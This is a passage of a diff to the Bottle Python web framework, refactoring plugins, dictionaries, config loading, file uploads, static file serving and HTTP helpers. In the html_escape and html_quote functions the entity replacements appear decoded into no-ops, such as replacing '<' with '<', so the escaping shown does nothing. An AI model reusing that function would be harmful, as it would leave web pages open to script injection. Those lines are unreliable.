traceback - super(HTTPError, self).__init__(body, status, header, **headers) - - - - + super(HTTPError, self).__init__(body, status, **more_headers) ############################################################################### # Plugins ###################################################################### ############################################################################### -class PluginError(BottleException): pass + +class PluginError(BottleException): + pass + class JSONPlugin(object): name = 'json' - api = 2 + api = 2 def __init__(self, json_dumps=json_dumps): self.json_dumps = json_dumps - def apply(self, callback, route): + def apply(self, callback, _): dumps = self.json_dumps if not dumps: return callback + def wrapper(*a, **ka): - rv = callback(*a, **ka) + try: + rv = callback(*a, **ka) + except HTTPError: + rv = _e() + if isinstance(rv, dict): #Attempt to serialize, raises exception on failure json_response = dumps(rv) - #Set content type only if serialization succesful + #Set content type only if serialization successful response.content_type = 'application/json' return json_response + elif isinstance(rv, HTTPResponse) and isinstance(rv.body, dict): + rv.body = dumps(rv.body) + rv.content_type = 'application/json' return rv - return wrapper - -class HooksPlugin(object): - name = 'hooks' - api = 2 - - _names = 'before_request', 'after_request', 'app_reset' - - def __init__(self): - self.hooks = dict((name, []) for name in self._names) - self.app = None - - def _empty(self): - return not (self.hooks['before_request'] or self.hooks['after_request']) - - def setup(self, app): - self.app = app - - def add(self, name, func): - ''' Attach a callback to a hook. ''' - was_empty = self._empty() - self.hooks.setdefault(name, []).append(func) - if self.app and was_empty and not self._empty(): self.app.reset() - - def remove(self, name, func): - ''' Remove a callback from a hook. ''' - was_empty = self._empty() - if name in self.hooks and func in self.hooks[name]: - self.hooks[name].remove(func) - if self.app and not was_empty and self._empty(): self.app.reset() - - def trigger(self, name, *a, **ka): - ''' Trigger a hook and return a list of results. ''' - hooks = self.hooks[name] - if ka.pop('reversed', False): hooks = hooks[::-1] - return [hook(*a, **ka) for hook in hooks] - - def apply(self, callback, route): - if self._empty(): return callback - def wrapper(*a, **ka): - self.trigger('before_request') - rv = callback(*a, **ka) - self.trigger('after_request', reversed=True) - return rv return wrapper class TemplatePlugin(object): - ''' This plugin applies the :func:`view` decorator to all routes with a + """ This plugin applies the :func:`view` decorator to all routes with a `template` config parameter. If the parameter is a tuple, the second element must be a dict with additional options (e.g. `template_engine`) - or default variables for the template. ''' + or default variables for the template. """ name = 'template' - api = 2 + api = 2 + + def setup(self, app): + app.tpl = self def apply(self, callback, route): conf = route.config.get('template') if isinstance(conf, (tuple, list)) and len(conf) == 2: return view(conf[0], **conf[1])(callback) - elif isinstance(conf, str) and 'template_opts' in route.config: - depr('The `template_opts` parameter is deprecated.') #0.9 - return view(conf, **route.config['template_opts'])(callback) elif isinstance(conf, str): return view(conf)(callback) else: @@ -1654,23 +1927,27 @@ class TemplatePlugin(object): #: Not a plugin, but part of the plugin API. TODO: Find a better place. class _ImportRedirect(object): def __init__(self, name, impmask): - ''' Create a virtual package that redirects imports (see PEP 302). ''' + """ Create a virtual package that redirects imports (see PEP 302). """ self.name = name self.impmask = impmask self.module = sys.modules.setdefault(name, imp.new_module(name)) - self.module.__dict__.update({'__file__': __file__, '__path__': [], - '__all__': [], '__loader__': self}) + self.module.__dict__.update({ + '__file__': __file__, + '__path__': [], + '__all__': [], + '__loader__': self + }) sys.meta_path.append(self) def find_module(self, fullname, path=None): if '.' not in fullname: return - packname, modname = fullname.rsplit('.', 1) + packname = fullname.rsplit('.', 1)[0] if packname != self.name: return return self def load_module(self, fullname): if fullname in sys.modules: return sys.modules[fullname] - packname, modname = fullname.rsplit('.', 1) + modname = fullname.rsplit('.', 1)[1] realname = self.impmask % modname __import__(realname) module = sys.modules[fullname] = sys.modules[realname] @@ -1678,11 +1955,6 @@ class _ImportRedirect(object): module.__loader__ = self return module - - - - - ############################################################################### # Common Utilities ############################################################# ############################################################################### @@ -1697,38 +1969,68 @@ class MultiDict(DictMixin): def __init__(self, *a, **k): self.dict = dict((k, [v]) for (k, v) in dict(*a, **k).items()) - def __len__(self): return len(self.dict) - def __iter__(self): return iter(self.dict) - def __contains__(self, key): return key in self.dict - def __delitem__(self, key): del self.dict[key] - def __getitem__(self, key): return self.dict[key][-1] - def __setitem__(self, key, value): self.append(key, value) - def keys(self): return self.dict.keys() + def __len__(self): + return len(self.dict) + + def __iter__(self): + return iter(self.dict) + + def __contains__(self, key): + return key in self.dict + + def __delitem__(self, key): + del self.dict[key] + + def __getitem__(self, key): + return self.dict[key][-1] + + def __setitem__(self, key, value): + self.append(key, value) + + def keys(self): + return self.dict.keys() if py3k: - def values(self): return (v[-1] for v in self.dict.values()) - def items(self): return ((k, v[-1]) for k, v in self.dict.items()) + + def values(self): + return (v[-1] for v in self.dict.values()) + + def items(self): + return ((k, v[-1]) for k, v in self.dict.items()) + def allitems(self): return ((k, v) for k, vl in self.dict.items() for v in vl) + iterkeys = keys itervalues = values iteritems = items iterallitems = allitems else: - def values(self): return [v[-1] for v in self.dict.values()] - def items(self): return [(k, v[-1]) for k, v in self.dict.items()] - def iterkeys(self): return self.dict.iterkeys() - def itervalues(self): return (v[-1] for v in self.dict.itervalues()) + + def values(self): + return [v[-1] for v in self.dict.values()] + + def items(self): + return [(k, v[-1]) for k, v in self.dict.items()] + + def iterkeys(self): + return self.dict.iterkeys() + + def itervalues(self): + return (v[-1] for v in self.dict.itervalues()) + def iteritems(self): return ((k, v[-1]) for k, v in self.dict.iteritems()) + def iterallitems(self): return ((k, v) for k, vl in self.dict.iteritems() for v in vl) + def allitems(self): return [(k, v) for k, vl in self.dict.iteritems() for v in vl] def get(self, key, default=None, index=-1, type=None): - ''' Return the most recent value for a key. + """ Return the most recent value for a key. :param default: The default value to be returned if the key is not present or the type conversion fails. @@ -1736,7 +2038,7 @@ class MultiDict(DictMixin): :param type: If defined, this callable is used to cast the value into a specific type. Exception are suppressed and result in the default value to be returned. - ''' + """ try: val = self.dict[key][index] return type(val) if type else val @@ -1745,15 +2047,15 @@ class MultiDict(DictMixin): return default def append(self, key, value): - ''' Add a new value to the list of values for this key. ''' + """ Add a new value to the list of values for this key. """ self.dict.setdefault(key, []).append(value) def replace(self, key, value): - ''' Replace the list of values with a single value. ''' + """ Replace the list of values with a single value. """ self.dict[key] = [value] def getall(self, key): - ''' Return a (possibly empty) list of values for a key. ''' + """ Return a (possibly empty) list of values for a key. """ return self.dict.get(key) or [] #: Aliases for WTForms to mimic other multi-dict APIs (Django) @@ -1761,14 +2063,13 @@ class MultiDict(DictMixin): getlist = getall - class FormsDict(MultiDict): - ''' This :class:`MultiDict` subclass is used to store request form data. + """ This :class:`MultiDict` subclass is used to store request form data. Additionally to the normal dict-like item access methods (which return unmodified data as native strings), this container also supports attribute-like access to its values. Attributes are automatically de- or recoded to match :attr:`input_encoding` (default: 'utf8'). Missing - attributes default to an empty string. ''' + attributes default to an empty string. """ #: Encoding used for attribute values. input_encoding = 'utf8' @@ -1777,16 +2078,17 @@ class FormsDict(MultiDict): recode_unicode = True def _fix(self, s, encoding=None): - if isinstance(s, unicode) and self.recode_unicode: # Python 3 WSGI - s = s.encode('latin1') - if isinstance(s, bytes): # Python 2 WSGI + if isinstance(s, unicode) and self.recode_unicode: # Python 3 WSGI + return s.encode('latin1').decode(encoding or self.input_encoding) + elif isinstance(s, bytes): # Python 2 WSGI return s.decode(encoding or self.input_encoding) - return s + else: + return s def decode(self, encoding=None): - ''' Returns a copy with all keys and values de- or recoded to match + """ Returns a copy with all keys and values de- or recoded to match :attr:`input_encoding`. Some libraries (e.g. WTForms) want a - unicode dictionary. ''' + unicode dictionary. """ copy = FormsDict() enc = copy.input_encoding = encoding or self.input_encoding copy.recode_unicode = False @@ -1795,6 +2097,7 @@ class FormsDict(MultiDict): return copy def getunicode(self, name, default=None, encoding=None): + """ Return the value as a unicode string, or the default. """ try: return self._fix(self[name], encoding) except (UnicodeError, KeyError): @@ -1815,16 +2118,33 @@ class HeaderDict(MultiDict): self.dict = {} if a or ka: self.update(*a, **ka) - def __contains__(self, key): return _hkey(key) in self.dict - def __delitem__(self, key): del self.dict[_hkey(key)] - def __getitem__(self, key): return self.dict[_hkey(key)][-1] - def __setitem__(self, key, value): self.dict[_hkey(key)] = [str(value)] + def __contains__(self, key): + return _hkey(key) in self.dict + + def __delitem__(self, key): + del self.dict[_hkey(key)] + + def __getitem__(self, key): + return self.dict[_hkey(key)][-1] + + def __setitem__(self, key, value): + self.dict[_hkey(key)] = [value if isinstance(value, unicode) else + str(value)] + def append(self, key, value): - self.dict.setdefault(_hkey(key), []).append(str(value)) - def replace(self, key, value): self.dict[_hkey(key)] = [str(value)] - def getall(self, key): return self.dict.get(_hkey(key)) or [] + self.dict.setdefault(_hkey(key), []).append( + value if isinstance(value, unicode) else str(value)) + + def replace(self, key, value): + self.dict[_hkey(key)] = [value if isinstance(value, unicode) else + str(value)] + + def getall(self, key): + return self.dict.get(_hkey(key)) or [] + def get(self, key, default=None, index=-1): return MultiDict.get(self, _hkey(key), default, index) + def filter(self, names): for name in [_hkey(n) for n in names]: if name in self.dict: @@ -1832,7 +2152,7 @@ class HeaderDict(MultiDict): class WSGIHeaderDict(DictMixin): - ''' This dict-like class wraps a WSGI environ dict and provides convenient + """ This dict-like class wraps a WSGI environ dict and provides convenient access to HTTP_* fields. Keys and values are native strings (2.x bytes or 3.x unicode) and keys are case-insensitive. If the WSGI environment contains non-native string values, these are de- or encoded @@ -1841,7 +2161,7 @@ class WSGIHeaderDict(DictMixin): The API will remain stable even on changes to the relevant PEPs. Currently PEP 333, 444 and 3333 are supported. (PEP 444 is the only one that uses non-native strings.) - ''' + """ #: List of keys that do not have a ``HTTP_`` prefix. cgikeys = ('CONTENT_TYPE', 'CONTENT_LENGTH') @@ -1849,18 +2169,24 @@ class WSGIHeaderDict(DictMixin): self.environ = environ def _ekey(self, key): - ''' Translate header field name to CGI/WSGI environ key. ''' - key = key.replace('-','_').upper() + """ Translate header field name to CGI/WSGI environ key. """ + key = key.replace('-', '_').upper() if key in self.cgikeys: return key return 'HTTP_' + key def raw(self, key, default=None): - ''' Return the header value as is (may be bytes or unicode). ''' + """ Return the header value as is (may be bytes or unicode). """ return self.environ.get(self._ekey(key), default) def __getitem__(self, key): - return tonat(self.environ[self._ekey(key)], 'latin1') + val = self.environ[self._ekey(key)] + if py3k: + if isinstance(val, unicode): + val = val.encode('latin1').decode('utf8') + else: + val = val.decode('utf8') + return val def __setitem__(self, key, value): raise TypeError("%s is read-only." % self.__class__) @@ -1871,47 +2197,126 @@ class WSGIHeaderDict(DictMixin): def __iter__(self): for key in self.environ: if key[:5] == 'HTTP_': - yield key[5:].replace('_', '-').title() + yield _hkey(key[5:]) elif key in self.cgikeys: - yield key.replace('_', '-').title() + yield _hkey(key) - def keys(self): return [x for x in self] - def __len__(self): return len(self.keys()) - def __contains__(self, key): return self._ekey(key) in self.environ + def keys(self): + return [x for x in self] + + def __len__(self): + return len(self.keys()) + + def __contains__(self, key): + return self._ekey(key) in self.environ class ConfigDict(dict): - ''' A dict-subclass with some extras: You can access keys like attributes. - Uppercase attributes create new ConfigDicts and act as name-spaces. - Other missing attributes return None. Calling a ConfigDict updates its - values and returns itself. + """ A dict-like configuration storage with additional support for + namespaces, validators, meta-data, on_change listeners and more. + """ - >>> cfg = ConfigDict() - >>> cfg.Namespace.value = 5 - >>> cfg.OtherNamespace(a=1, b=2) - >>> cfg - {'Namespace': {'value': 5}, 'OtherNamespace': {'a': 1, 'b': 2}} - ''' + __slots__ = ('_meta', '_on_change') - def __getattr__(self, key): - if key not in self and key[0].isupper(): - self[key] = ConfigDict() - return self.get(key) + def __init__(self): + self._meta = {} + self._on_change = lambda name, value: None - def __setattr__(self, key, value): - if hasattr(dict, key): - raise AttributeError('Read-only attribute.') - if key in self and self[key] and isinstance(self[key], ConfigDict): - raise AttributeError('Non-empty namespace attribute.') - self[key] = value - - def __delattr__(self, key): - if key in self: del self[key] - - def __call__(self, *a, **ka): - for key, value in dict(*a, **ka).items(): setattr(self, key, value) + def load_module(self, path, squash): + """ Load values from a Python module. + :param squash: Squash nested dicts into namespaces by using + load_dict(), otherwise use update() + Example: load_config('my.app.settings', True) + Example: load_config('my.app.settings', False) + """ + config_obj = __import__(path) + obj = dict([(key, getattr(config_obj, key)) + for key in dir(config_obj) if key.isupper()]) + if squash: + self.load_dict(obj) + else: + self.update(obj) return self + def load_config(self, filename): + """ Load values from an ``*.ini`` style config file. + + If the config file contains sections, their names are used as + namespaces for the values within. The two special sections + ``DEFAULT`` and ``bottle`` refer to the root namespace (no prefix). + """ + conf = ConfigParser() + conf.read(filename) + for section in conf.sections(): + for key, value in conf.items(section): + if section not in ('DEFAULT', 'bottle'): + key = section + '.' + key + self[key] = value + return self + + def load_dict(self, source, namespace=''): + """ Load values from a dictionary structure. Nesting can be used to + represent namespaces. + + >>> c = ConfigDict() + >>> c.load_dict({'some': {'namespace': {'key': 'value'} } }) + {'some.namespace.key': 'value'} + """ + for key, value in source.items(): + if isinstance(key, basestring): + nskey = (namespace + '.' + key).strip('.') + if isinstance(value, dict): + self.load_dict(value, namespace=nskey) + else: + self[nskey] = value + else: + raise TypeError('Key has type %r (not a string)' % type(key)) + return self + + def update(self, *a, **ka): + """ If the first parameter is a string, all keys are prefixed with this + namespace. Apart from that it works just as the usual dict.update(). + Example: ``update('some.namespace', key='value')`` """ + prefix = '' + if a and isinstance(a[0], basestring): + prefix = a[0].strip('.') + '.' + a = a[1:] + for key, value in dict(*a, **ka).items(): + self[prefix + key] = value + + def setdefault(self, key, value): + if key not in self: + self[key] = value + return self[key] + + def __setitem__(self, key, value): + if not isinstance(key, basestring): + raise TypeError('Key has type %r (not a string)' % type(key)) + value = self.meta_get(key, 'filter', lambda x: x)(value) + if key in self and self[key] is value: + return + self._on_change(key, value) + dict.__setitem__(self, key, value) + + def __delitem__(self, key): + self._on_change(key, None) + dict.__delitem__(self, key) + + def meta_get(self, key, metafield, default=None): + """ Return the value of a meta field for a key. """ + return self._meta.get(key, {}).get(metafield, default) + + def meta_set(self, key, metafield, value): + """ Set the meta field for a key to a new value. This triggers the + on-change handler for existing keys. """ + self._meta.setdefault(key, {})[metafield] = value + if key in self: + self[key] = self[key] + + def meta_list(self, key): + """ Return an iterable of meta field names defined for a key. """ + return self._meta.get(key, {}).keys() + class AppStack(list): """ A stack-like list. Calling it returns the head of the stack. """ @@ -1929,8 +2334,7 @@ class AppStack(list): class WSGIFileWrapper(object): - - def __init__(self, fp, buffer_size=1024*64): + def __init__(self, fp, buffer_size=1024 * 64): self.fp, self.buffer_size = fp, buffer_size for attr in ('fileno', 'close', 'read', 'readlines', 'tell', 'seek'): if hasattr(fp, attr): setattr(self, attr, getattr(fp, attr)) @@ -1943,23 +2347,34 @@ class WSGIFileWrapper(object): yield part -class _iterchain(itertools.chain): - ''' This only exists to be able to attach a .close method to iterators that - do not support attribute assignment (most of itertools). ''' +class _closeiter(object): + """ This only exists to be able to attach a .close method to iterators that + do not support attribute assignment (most of itertools). """ + + def __init__(self, iterator, close=None): + self.iterator = iterator + self.close_callbacks = makelist(close) + + def __iter__(self): + return iter(self.iterator) + + def close(self): + for func in self.close_callbacks: + func() class ResourceManager(object): - ''' This class manages a list of search paths and helps to find and open + """ This class manages a list of search paths and helps to find and open application-bound resources (files). :param base: default value for :meth:`add_path` calls. :param opener: callable used to open resources. :param cachemode: controls which lookups are cached. One of 'all', 'found' or 'none'. - ''' + """ def __init__(self, base='./', opener=open, cachemode='all'): - self.opener = open + self.opener = opener self.base = base self.cachemode = cachemode @@ -1969,7 +2384,7 @@ class ResourceManager(object): self.cache = {} def add_path(self, path, base=None, index=None, create=False): - ''' Add a new path to the list of search paths. Return False if the + """ Add a new path to the list of search paths. Return False if the path does not exist. :param path: The new search path. Relative paths are turned into @@ -1984,7 +2399,7 @@ class ResourceManager(object): along with a python module or package:: res.add_path('./resources/', __file__) - ''' + """ base = os.path.abspath(os.path.dirname(base or self.base)) path = os.path.abspath(os.path.join(base, os.path.dirname(path))) path += os.sep @@ -2000,7 +2415,7 @@ class ResourceManager(object): return os.path.exists(path) def __iter__(self): - ''' Iterate over all existing files in all registered paths. ''' + """ Iterate over all existing files in all registered paths. """ search = self.path[:] while search: path = search.pop() @@ -2011,11 +2426,11 @@ class ResourceManager(object): else: yield full def lookup(self, name): - ''' Search for a resource and return an absolute file path, or `None`. + """ Search for a resource and return an absolute file path, or `None`. The :attr:`path` list is searched in order. The first match is returend. Symlinks are followed. The result is cached to speed up - future lookups. ''' + future lookups. """ if name not in self.cache or DEBUG: for path in self.path: fpath = os.path.join(path, name) @@ -2028,22 +2443,80 @@ class ResourceManager(object): return self.cache[name] def open(self, name, mode='r', *args, **kwargs): - ''' Find a resource and return a file object, or raise IOError. ''' + """ Find a resource and return a file object, or raise IOError. """ fname = self.lookup(name) if not fname: raise IOError("Resource %r not found." % name) - return self.opener(name, mode=mode, *args, **kwargs) + return self.opener(fname, mode=mode, *args, **kwargs) +class FileUpload(object): + def __init__(self, fileobj, name, filename, headers=None): + """ Wrapper for file uploads. """ + #: Open file(-like) object (BytesIO buffer or temporary file) + self.file = fileobj + #: Name of the upload form field + self.name = name + #: Raw filename as sent by the client (may contain unsafe characters) + self.raw_filename = filename + #: A :class:`HeaderDict` with additional headers (e.g. content-type) + self.headers = HeaderDict(headers) if headers else HeaderDict() + content_type = HeaderProperty('Content-Type') + content_length = HeaderProperty('Content-Length', reader=int, default=-1) + @cached_property + def filename(self): + """ Name of the file on the client file system, but normalized to ensure + file system compatibility. An empty filename is returned as 'empty'. + Only ASCII letters, digits, dashes, underscores and dots are + allowed in the final filename. Accents are removed, if possible. + Whitespace is replaced by a single dash. Leading or tailing dots + or dashes are removed. The filename is limited to 255 characters. + """ + fname = self.raw_filename + if not isinstance(fname, unicode): + fname = fname.decode('utf8', 'ignore') + fname = normalize('NFKD', fname) + fname = fname.encode('ASCII', 'ignore').decode('ASCII') + fname = os.path.basename(fname.replace('\\', os.path.sep)) + fname = re.sub(r'[^a-zA-Z0-9-_.\s]', '', fname).strip() + fname = re.sub(r'[-\s]+', '-', fname).strip('.-') + return fname[:255] or 'empty' + + def _copy_file(self, fp, chunk_size=2 ** 16): + read, write, offset = self.file.read, fp.write, self.file.tell() + while 1: + buf = read(chunk_size) + if not buf: break + write(buf) + self.file.seek(offset) + + def save(self, destination, overwrite=False, chunk_size=2 ** 16): + """ Save file to disk or copy its content to an open file(-like) object. + If *destination* is a directory, :attr:`filename` is added to the + path. Existing files are not overwritten by default (IOError). + + :param destination: File path, directory or file(-like) object. + :param overwrite: If True, replace existing files. (default: False) + :param chunk_size: Bytes to read at a time. (default: 64kb) + """ + if isinstance(destination, basestring): # Except file-likes here + if os.path.isdir(destination): + destination = os.path.join(destination, self.filename) + if not overwrite and os.path.exists(destination): + raise IOError('File exists.') + with open(destination, 'wb') as fp: + self._copy_file(fp, chunk_size) + else: + self._copy_file(destination, chunk_size) ############################################################################### # Application Helper ########################################################### ############################################################################### -def abort(code=500, text='Unknown Error: Application stopped.'): +def abort(code=500, text='Unknown Error.'): """ Aborts execution and causes a HTTP error. """ raise HTTPError(code, text) @@ -2051,14 +2524,17 @@ def abort(code=500, text='Unknown Error: Application stopped.'): def redirect(url, code=None): """ Aborts execution and causes a 303 or 302 redirect, depending on the HTTP protocol version. """ - if code is None: + if not code: code = 303 if request.get('SERVER_PROTOCOL') == "HTTP/1.1" else 302 - location = urljoin(request.url, url) - raise HTTPResponse("", status=code, Location=location) + res = response.copy(cls=HTTPResponse) + res.status = code + res.body = "" + res.set_header('Location', urljoin(request.url, url)) + raise res -def _file_iter_range(fp, offset, bytes, maxread=1024*1024): - ''' Yield chunks from a range in a file. No chunk is bigger than maxread.''' +def _file_iter_range(fp, offset, bytes, maxread=1024 * 1024): + """ Yield chunks from a range in a file. No chunk is bigger than maxread.""" fp.seek(offset) while bytes > 0: part = fp.read(min(bytes, maxread)) @@ -2067,12 +2543,29 @@ def _file_iter_range(fp, offset, bytes, maxread=1024*1024): yield part -def static_file(filename, root, mimetype='auto', download=False): +def static_file(filename, root, + mimetype='auto', + download=False, + charset='UTF-8'): """ Open a file in a safe way and return :exc:`HTTPResponse` with status - code 200, 305, 401 or 404. Set Content-Type, Content-Encoding, - Content-Length and Last-Modified header. Obey If-Modified-Since header - and HEAD requests. + code 200, 305, 403 or 404. The ``Content-Type``, ``Content-Encoding``, + ``Content-Length`` and ``Last-Modified`` headers are set if possible. + Special support for ``If-Modified-Since``, ``Range`` and ``HEAD`` + requests. + + :param filename: Name or path of the file to send. + :param root: Root path for file lookups. Should be an absolute directory + path. + :param mimetype: Defines the content-type header (default: guess from + file extension) + :param download: If True, ask the browser to open a `Save as...` dialog + instead of opening the file with the associated program. You can + specify a custom filename as a string. If not specified, the + original filename is used (default: False). + :param charset: The charset to use for files with a ``text/*`` + mime-type. (default: UTF-8) """ + root = os.path.abspath(root) + os.sep filename = os.path.abspath(os.path.join(root, filename.strip('/\\'))) headers = dict() @@ -2085,10 +2578,15 @@ def static_file(filename, root, mimetype='auto', download=False): return HTTPError(403, "You do not have permission to access this file.") if mimetype == 'auto': - mimetype, encoding = mimetypes.guess_type(filename) - if mimetype: headers['Content-Type'] = mimetype + if download and download != True: + mimetype, encoding = mimetypes.guess_type(download) + else: + mimetype, encoding = mimetypes.guess_type(filename) if encoding: headers['Content-Encoding'] = encoding - elif mimetype: + + if mimetype: + if mimetype[:5] == 'text/' and charset and 'charset' not in mimetype: + mimetype += '; charset=%s' % charset headers['Content-Type'] = mimetype if download: @@ -2104,7 +2602,8 @@ def static_file(filename, root, mimetype='auto', download=False): if ims: ims = parse_date(ims.split(";")[0].strip()) if ims is not None and ims >= int(stats.st_mtime): - headers['Date'] = time.strftime("%a, %d %b %Y %H:%M:%S GMT", time.gmtime()) + headers['Date'] = time.strftime("%a, %d %b %Y %H:%M:%S GMT", + time.gmtime()) return HTTPResponse(status=304, **headers) body = '' if request.method == 'HEAD' else open(filename, 'rb') @@ -2116,17 +2615,12 @@ def static_file(filename, root, mimetype='auto', download=False): if not ranges: return HTTPError(416, "Requested Range Not Satisfiable") offset, end = ranges[0] - headers["Content-Range"] = "bytes %d-%d/%d" % (offset, end-1, clen) - headers["Content-Length"] = str(end-offset) - if body: body = _file_iter_range(body, offset, end-offset) + headers["Content-Range"] = "bytes %d-%d/%d" % (offset, end - 1, clen) + headers["Content-Length"] = str(end - offset) + if body: body = _file_iter_range(body, offset, end - offset) return HTTPResponse(body, status=206, **headers) return HTTPResponse(body, **headers) - - - - - ############################################################################### # HTTP Utilities and MISC (TODO) ############################################### ############################################################################### @@ -2136,14 +2630,25 @@ def debug(mode=True): """ Change the debug level. There is only one debug level supported at the moment.""" global DEBUG + if mode: warnings.simplefilter('default') DEBUG = bool(mode) +def http_date(value): + if isinstance(value, (datedate, datetime)): + value = value.utctimetuple() + elif isinstance(value, (int, float)): + value = time.gmtime(value) + if not isinstance(value, basestring): + value = time.strftime("%a, %d %b %Y %H:%M:%S GMT", value) + return value + + def parse_date(ims): """ Parse rfc1123, rfc850 and asctime timestamps and return UTC epoch. """ try: ts = email.utils.parsedate_tz(ims) - return time.mktime(ts[:8] + (0,)) - (ts[9] or 0) - time.timezone + return time.mktime(ts[:8] + (0, )) - (ts[9] or 0) - time.timezone except (TypeError, ValueError, IndexError, OverflowError): return None @@ -2153,32 +2658,34 @@ def parse_auth(header): try: method, data = header.split(None, 1) if method.lower() == 'basic': - user, pwd = touni(base64.b64decode(tob(data))).split(':',1) + user, pwd = touni(base64.b64decode(tob(data))).split(':', 1) return user, pwd except (KeyError, ValueError): return None + def parse_range_header(header, maxlen=0): - ''' Yield (start, end) ranges parsed from a HTTP Range header. Skip - unsatisfiable ranges. The end index is non-inclusive.''' + """ Yield (start, end) ranges parsed from a HTTP Range header. Skip + unsatisfiable ranges. The end index is non-inclusive.""" if not header or header[:6] != 'bytes=': return ranges = [r.split('-', 1) for r in header[6:].split(',') if '-' in r] for start, end in ranges: try: if not start: # bytes=-100 -> last 100 bytes - start, end = max(0, maxlen-int(end)), maxlen + start, end = max(0, maxlen - int(end)), maxlen elif not end: # bytes=100- -> all but the first 99 bytes start, end = int(start), maxlen - else: # bytes=100-200 -> bytes 100-200 (inclusive) - start, end = int(start), min(int(end)+1, maxlen) + else: # bytes=100-200 -> bytes 100-200 (inclusive) + start, end = int(start), min(int(end) + 1, maxlen) if 0 <= start < end <= maxlen: yield start, end except ValueError: pass + def _parse_qsl(qs): r = [] - for pair in qs.replace(';','&').split('&'): + for pair in qs.replace(';', '&').split('&'): if not pair: continue nv = pair.split('=', 1) if len(nv) != 2: nv.append('') @@ -2187,21 +2694,23 @@ def _parse_qsl(qs): r.append((key, value)) return r + def _lscmp(a, b): - ''' Compares two strings in a cryptographically safe way: - Runtime is not affected by length of common prefix. ''' - return not sum(0 if x==y else 1 for x, y in zip(a, b)) and len(a) == len(b) + """ Compares two strings in a cryptographically safe way: + Runtime is not affected by length of common prefix. """ + return not sum(0 if x == y else 1 + for x, y in zip(a, b)) and len(a) == len(b) def cookie_encode(data, key): - ''' Encode and sign a pickle-able object. Return a (byte) string ''' + """ Encode and sign a pickle-able object. Return a (byte) string """ msg = base64.b64encode(pickle.dumps(data, -1)) sig = base64.b64encode(hmac.new(tob(key), msg).digest()) return tob('!') + sig + tob('?') + msg def cookie_decode(data, key): - ''' Verify and decode an encoded string. Return an object or None.''' + """ Verify and decode an encoded string. Return an object or None.""" data = tob(data) if cookie_is_encoded(data): sig, msg = data.split(tob('?'), 1) @@ -2211,20 +2720,20 @@ def cookie_decode(data, key): def cookie_is_encoded(data): - ''' Return True if the argument looks like a encoded cookie.''' + """ Return True if the argument looks like a encoded cookie.""" return bool(data.startswith(tob('!')) and tob('?') in data) def html_escape(string): - ''' Escape HTML special characters ``&<>`` and quotes ``'"``. ''' - return string.replace('&','&').replace('<','<').replace('>','>')\ - .replace('"','"').replace("'",''') + """ Escape HTML special characters ``&<>`` and quotes ``'"``. """ + return string.replace('&', '&').replace('<', '<').replace('>', '>')\ + .replace('"', '"').replace("'", ''') def html_quote(string): - ''' Escape and quote a string to be used as an HTTP attribute.''' - return '"%s"' % html_escape(string).replace('\n','%#10;')\ - .replace('\r',' ').replace('\t',' ') + """ Escape and quote a string to be used as an HTTP attribute.""" + return '"%s"' % html_escape(string).replace('\n', ' ')\ + .replace('\r', ' ').replace('\t', ' ') def yieldroutes(func): @@ -2233,40 +2742,39 @@ def yieldroutes(func): takes optional keyword arguments. The output is best described by example:: a() -> '/a' - b(x, y) -> '/b/:x/:y' - c(x, y=5) -> '/c/:x' and '/c/:x/:y' - d(x=5, y=6) -> '/d' and '/d/:x' and '/d/:x/:y' + b(x, y) -> '/b/<x>/<y>' + c(x, y=5) -> '/c/<x>' and '/c/<x>/<y>' + d(x=5, y=6) -> '/d' and '/d/<x>' and '/d/<x>/<y>' """ - import inspect # Expensive module. Only import if necessary. - path = '/' + func.__name__.replace('__','/').lstrip('/') - spec = inspect.getargspec(func) + path = '/' + func.__name__.replace('__', '/').lstrip('/') + spec = getargspec(func) argc = len(spec[0]) - len(spec[3] or []) - path += ('/:%s' * argc) % tuple(spec[0][:argc]) + path += ('/<%s>' * argc) % tuple(spec[0][:argc]) yield path for arg in spec[0][argc:]: - path += '/:%s' % arg + path += '/<%s>' % arg yield path def path_shift(script_name, path_info, shift=1): - ''' Shift path fragments from PATH_INFO to SCRIPT_NAME and vice versa. + """ Shift path fragments from PATH_INFO to SCRIPT_NAME and vice versa. :return: The modified paths. :param script_name: The SCRIPT_NAME path. :param script_name: The PATH_INFO path. :param shift: The number of path fragments to shift. May be negative to change the shift direction. (default: 1) - ''' + """ if shift == 0: return script_name, path_info pathlist = path_info.strip('/').split('/') scriptlist = script_name.strip('/').split('/') if pathlist and pathlist[0] == '': pathlist = [] if scriptlist and scriptlist[0] == '': scriptlist = [] - if shift > 0 and shift <= len(pathlist): + if 0 < shift <= len(pathlist): moved = pathlist[:shift] scriptlist = scriptlist + moved pathlist = pathlist[shift:] - elif shift < 0 and shift >= -len(scriptlist): + elif 0 > shift >= -len(scriptlist): moved = scriptlist[shift:] pathlist = moved + pathlist scriptlist = scriptlist[:shift] @@ -2279,56 +2787,45 @@ def path_shift(script_name, path_info, shift=1): return new_script_name, new_path_info -def validate(**vkargs): - """ - Validates and manipulates keyword arguments by user defined callables. - Handles ValueError and missing arguments by raising HTTPError(403). - """ - depr('Use route wildcard filters instead.') - def decorator(func): - @functools.wraps(func) - def wrapper(*args, **kargs): - for key, value in vkargs.items(): - if key not in kargs: - abort(403, 'Missing parameter: %s' % key) - try: - kargs[key] = value(kargs[key]) - except ValueError: - abort(403, 'Wrong parameter format for: %s' % key) - return func(*args, **kargs) - return wrapper - return decorator - - def auth_basic(check, realm="private", text="Access denied"): - ''' Callback decorator to require HTTP auth (basic). - TODO: Add route(check_auth=...) parameter. ''' - def decorator(func): - def wrapper(*a, **ka): - user, password = request.auth or (None, None) - if user is None or not check(user, password): - response.headers['WWW-Authenticate'] = 'Basic realm="%s"' % realm - return HTTPError(401, text) - return func(*a, **ka) - return wrapper - return decorator + """ Callback decorator to require HTTP auth (basic). + TODO: Add route(check_auth=...) parameter. """ + def decorator(func): + + @functools.wraps(func) + def wrapper(*a, **ka): + user, password = request.auth or (None, None) + if user is None or not check(user, password): + err = HTTPError(401, text) + err.add_header('WWW-Authenticate', 'Basic realm="%s"' % realm) + return err + return func(*a, **ka) + + return wrapper + + return decorator # Shortcuts for common Bottle methods. # They all refer to the current default application. + def make_default_app_wrapper(name): - ''' Return a callable that relays calls to the current default app. ''' + """ Return a callable that relays calls to the current default app. """ + @functools.wraps(getattr(Bottle, name)) def wrapper(*a, **ka): return getattr(app(), name)(*a, **ka) + return wrapper + route = make_default_app_wrapper('route') get = make_default_app_wrapper('get') post = make_default_app_wrapper('post') put = make_default_app_wrapper('put') delete = make_default_app_wrapper('delete') +patch = 